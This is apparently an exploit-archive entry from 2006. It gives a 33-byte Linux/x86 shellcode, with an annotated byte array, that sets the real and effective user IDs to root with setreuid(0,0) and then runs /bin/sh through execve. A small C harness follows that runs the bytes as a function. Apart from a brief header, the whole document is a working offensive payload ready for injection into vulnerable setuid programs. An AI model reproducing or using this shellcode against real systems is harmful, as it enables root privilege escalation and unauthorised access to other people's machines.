
linux/x86 setreuid(0,0) execve("/bin/sh", ["/bin/sh", NULL]) 33 bytes


/*
* (Linux/x86) setreuid(0,0) execve("/bin/sh", ["/bin/sh", NULL])
* - 33 bytes
* - xgc@gotfault.net
*
*/

#include <stdio.h>
#include <string.h>

char shellcode[] =

"\x6a\x46" // push $0x46 (syscall number 70, setreuid)
"\x58" // pop %eax
"\x31\xdb" // xor %ebx, %ebx (ruid = 0)
"\x31\xc9" // xor %ecx, %ecx (euid = 0)
"\xcd\x80" // int $0x80

"\x31\xd2" // xor %edx, %edx (envp = NULL)
"\x6a\x0b" // push $0xb (syscall number 11, execve)
"\x58" // pop %eax
"\x52" // push %edx (string terminator)
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f ("//sh")
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f ("/bin")
"\x89\xe3" // mov %esp, %ebx (filename)
"\x52" // push %edx (argv[1] = NULL)
"\x53" // push %ebx (argv[0])
"\x89\xe1" // mov %esp, %ecx (argv)
"\xcd\x80"; // int $0x80

int main() {

    int (*f)() = (int(*)())shellcode;
    printf("Length: %zu\n", strlen(shellcode));
    f();
}

[2006-04-03]